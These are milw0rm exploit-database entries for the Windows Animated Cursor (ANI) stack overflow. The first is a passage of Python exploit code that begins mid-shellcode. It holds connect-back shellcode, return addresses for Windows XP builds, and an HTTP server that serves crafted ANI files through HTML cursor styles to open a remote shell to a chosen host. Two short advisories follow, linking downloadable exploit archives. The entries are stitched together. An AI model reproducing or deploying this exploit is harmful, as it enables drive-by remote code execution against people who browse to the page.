'\x53\x53\x53\x43\x53\x43\x53\xff\xd0\x68\x7f\x00\x00\x01\x66' + \ '\x68\x04\xd2\x66\x53\x89\xe1\x95\x68\xec\xf9\xaa\x60\x57\xff' + \ '\xd6\x6a\x10\x51\x55\xff\xd0\x66\x6a\x64\x66\x68\x63\x6d\x6a' + \ '\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89\xe2\x31\xc0\xf3\xaa\x95' + \ '\x89\xfd\xfe\x42\x2d\xfe\x42\x2c\x8d\x7a\x38\xab\xab\xab\x68' + \ '\x72\xfe\xb3\x16\xff\x75\x28\xff\xd6\x5b\x57\x52\x51\x51\x51' + \ '\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53\xff' + \ '\xd6\x6a\xff\xff\x37\xff\xd0\x68\xe7\x79\xc6\x79\xff\x75\x04' + \ '\xff\xd6\xff\x77\xfc\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6' + \ '\xff\xd0' # Target list target = [ \ # call [ebx+4] # Microsoft Windows XP SP2 user32.dll (5.1.2600.2622) Multi Language {'addr': 0x25ba, 'len': 2, 'offset': 80}, # Microsoft Windows XP SP2 user32.dll (5.1.2600.2180) Multi Language {'addr': 0x25d0, 'len': 2, 'offset': 80}, # Microsoft Windows XP SP2 userenv.dll (5.1.2600.2180) English {'addr': 0x769fc81a, 'len': 4, 'offset': 80}, # Microsoft Windows XP SP2 user32.dll (5.1.2600.2180) English # {'addr': 0x77d825d0, 'len': 4, 'offset': 80}, # Microsoft Windows XP SP2 userenv.dll (5.1.2600.2180) Portuguese (Brazil) {'addr': 0x769dc81a, 'len': 4, 'offset': 80}, # Microsoft Windows XP SP2 user32.dll (5.1.2600.2180) Portuguese (Brazil) # {'addr': 0x77d625d0, 'len': 4, 'offset': 80}, # call [esi+4] # Microsoft Windows XP SP1a userenv.dll English {'addr': 0x75a758b1, 'len': 4, 'offset': 80}, # Microsoft Windows XP SP1a shell32.dll English # {'addr': 0x77441a66, 'len': 4, 'offset': 80}, # Microsoft Windows XP userenv.dll (5.1.2600.0) Portuguese (Brazil) {'addr': 0x75a4579b, 'len': 4, 'offset': 80}, # Microsoft Windows XP shell32.dll (6.0.2600.0) Portuguese (Brazil) # {'addr': 0x77427214, 'len': 4, 'offset': 80}, ] # Target list index tidx = 0 def randstr(count = 1, charset = 'ascii_alpha'): # Set the charset if charset == 'ascii_alpha': charset = digits + ascii_uppercase + ascii_lowercase elif charset == 'ascii_letters': charset = ascii_letters elif charset == 'ascii_lowercase': charset = ascii_lowercase elif charset == 'ascii_uppercase': charset = ascii_uppercase elif charset == 'digits': charset = digits elif charset == 'hexdigits': charset = hexdigits elif charset == 'octdigits': charset = octdigits # Create the string i = 0 str = '' while i < count: str = str + charset[randint(0, len(charset)-1)] i = i + 1 return str def riff_chunk(): chunk_id = randstr(4) chunk_data = randstr(randint(1, 256)*2) chunk_size = pack('<L', len(chunk_data)) return chunk_id + chunk_size + chunk_data def riff_ani_file(): global buf, target, tidx # Create the first header subchunk anih_a = [36, randint(1, 65535), randint(1, 65535), 0, 0, 0, 0, 0, 1] anih_a = pack('<%dL' % len(anih_a), *[i for i in anih_a]) anih_a = 'anih' + pack('<L', len(anih_a)) + anih_a # Create the second header subchunk anih_b = randstr(target[tidx]['offset']) # Set the current indexed target if target[tidx]['len'] == 1: anih_b = anih_b + pack('<B', target[tidx]['addr']) elif target[tidx]['len'] == 2: anih_b = anih_b + pack('<H', target[tidx]['addr']) else: anih_b = anih_b + pack('<L', target[tidx]['addr']) anih_b = 'anih' + pack('<L', len(anih_b)) + anih_b # Format ID riff = 'ACON' # Random subchunks for i in range(randint(1, 256)): riff = riff + riff_chunk() # First header subchunk riff = riff + anih_a # Random subchunks for i in range(randint(1, 256)): riff = riff + riff_chunk() # Second header subchunk riff = riff + anih_b # Shellcode riff = riff + buf # File ID and length of file riff = 'RIFF' + pack('<L', len(riff)) + riff # Update the target list index if tidx < len(target)-1: tidx = tidx + 1 else: tidx = 0 return riff def randhtml(): global buf, target, tidx # Random RIFF file extensions extension = ['ani', 'avi', 'cdr', 'rmi', 'wav'] # Random html document html = \ '<html>\n<head>\n<title>' + \ randstr(randint(1, 256)) + \ '</title>\n</head>\n<body>\n' for i in range(randint(0, 4)): html = html + randstr(randint(1, 256)) + '\n' for i in range(len(target)): html = html + \ '<div id="' + randstr(randint(4, 16)) + '" ' \ 'style="cursor: url(/' + randstr(randint(4, 16)) + '.' + \ extension[randint(0, len(extension)-1)] + ')">\n' for i in range(randint(0, 4)): html = html + randstr(randint(1, 256)) + '\n' html = html + '</div>\n' for i in range(randint(0, 4)): html = html + randstr(randint(1, 256)) + '\n' html = html + '</body>\n</html>\n' return html class RequestHandler(BaseHTTPRequestHandler): def do_GET(self): self.send_response(200) if self.path == '/': # Send the html document html = randhtml() self.send_header('Content-Type', 'text/html; charset=UTF-8') self.send_header('Content-Length', str(len(html))) self.end_headers() self.wfile.write(html) return # Generate and send the RIFF file riff = riff_ani_file() self.send_header('Content-Type', 'application/octetstream') self.send_header('Content-Length', str(len(riff))) self.end_headers() self.wfile.write(riff) def usage(): print 'Usage: ./%s <http_host> <http_port> <host> <port>' \ % basename(argv[0]) if __name__ == '__main__': print 'Windows Animated Cursor Stack Overflow Exploit' print 'Copyright 2007 RISE Security <contact@risesecurity.org>\n' args = argv[1:] if '-h' in args or '--help' in args: usage() exit() http_host = '0.0.0.0' http_port = 8080 host = '127.0.0.1' port = 1234 try: http_host = argv[1] http_port = atoi(argv[2]) host = argv[3] port = atoi(argv[4]) except: pass # Set shellcode host and port to connect to buf = buf[:160] + inet_aton(gethostbyname(host)) + buf[164:] buf = buf[:166] + pack('<H', port) + buf[168:] # Start the HTTP server server_class = HTTPServer httpd = server_class((http_host, http_port), RequestHandler) print 'Listening on %s:%s' % (http_host, http_port) try: httpd.serve_forever() except: pass # milw0rm.com [2007-06-07]

Microsoft ANI Buffer Overflow Exploit Author: Trirat Puttaraksa http://sf-freedom.blogspot.com Tested on: Windows XP SP2 fully patched + IE 6 SP2 For educational purpose only There are many confuses about this vulnerability. Someone said that this could not be exploited in XP SP2 - that's wrong. I provide this exploit because I wanna to tell these people that they are in danger. This exploit will call calc.exe (shellcode fome metasploit win32_exec CMD=calc.exe EXITFUNC=process). P.S. I do not include the source code for generate the .ani file because of its damage. However, if you reverse engineer .ani file, you will know how could I produce this exploit in 10 minutes. I will describe this vulnerability and how to exploit it in my blog after M$ released patch. greets: used SkyLined's idea of exploitation. tnx to him. https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/3635.zip (04012007-ani.zip) # milw0rm.com [2007-04-01]

..::[ jamikazu presents ]::.. Windows Animated Cursor Handling Exploit (0day) Works on fully patched Windows Vista I think it is first real remote code execution exploit on vista =) Tested on: Windows Vista Enterprise Version 6.0 (Build 6000) (default installation and UAC enabled) Windows Vista Ultimate Version 6.0 (Build 6000) (default installation and UAC enabled) Windows XP SP2 (It also must to work on all nt based windows but not tested) Author: jamikazu Mail: jamikazu@gmail.com Bug discovered by determina (http://www.determina.com) Credit: milw0rm,metasploit, SkyLined, http://doctus.net/ invokes calc.exe if successful https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/3634.zip (04012007-Animated_Cursor_Exploit.zip) # milw0rm.com [2007-04-01]